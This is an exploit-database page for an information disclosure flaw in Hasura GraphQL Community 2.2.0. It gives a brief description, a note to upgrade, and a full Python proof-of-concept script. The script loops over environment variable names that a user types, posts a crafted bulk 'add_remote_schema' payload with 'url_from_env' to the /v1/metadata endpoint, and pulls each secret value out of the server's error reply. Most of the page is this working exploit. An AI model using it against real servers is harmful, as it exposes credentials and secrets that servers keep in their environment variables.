header-logo
Suggest Exploit
vendor:
GraphQL Community
by:
Dolev Farhi
8.8
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: GraphQL Community
Affected Version From: 2.2.2000
Affected Version To: 2.2.2000
Patch Exists: YES
Related CWE:
CPE: a:hasura:graphql-engine:2.2.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2022

Hasura GraphQL 2.2.0 – Information Disclosure

An information disclosure vulnerability exists in Hasura GraphQL Community 2.2.0. An attacker can send a specially crafted request to the server to leak environment variables. The attacker can send a POST request to the '/v1/metadata' endpoint with a specially crafted payload containing an environment variable key to leak. This can lead to the disclosure of sensitive information.

Mitigation:

Upgrade to the latest version of Hasura GraphQL Community.
Source

Exploit-DB raw data:

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu

import requests

SERVER_ADDR = 'x.x.x.x'

url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

while True:
    env_var = input('Type environment variable key to leak.\n> ')
    if not env_var:
        continue

    payload = {
    "type": "bulk",
    "source": "",
    "args": [
        {
            "type": "add_remote_schema",
            "args": {
                "name": "ttt",
                "definition": {
                    "timeout_seconds": 60,
                    "forward_client_headers": False,
                    "headers": [],
                    "url_from_env": env_var
                },
                "comment": ""
            }
        }
    ],
    "resource_version": 2
}
    r = requests.post(url, json=payload)
    try:
       print(r.json()['error'].split('not a valid URI:')[1])
    except IndexError:
        print('Could not parse out VAR, dumping error as is')
        print(r.json().get('error', 'N/A'))

Navigation

Suggest Exploit

Services By CQR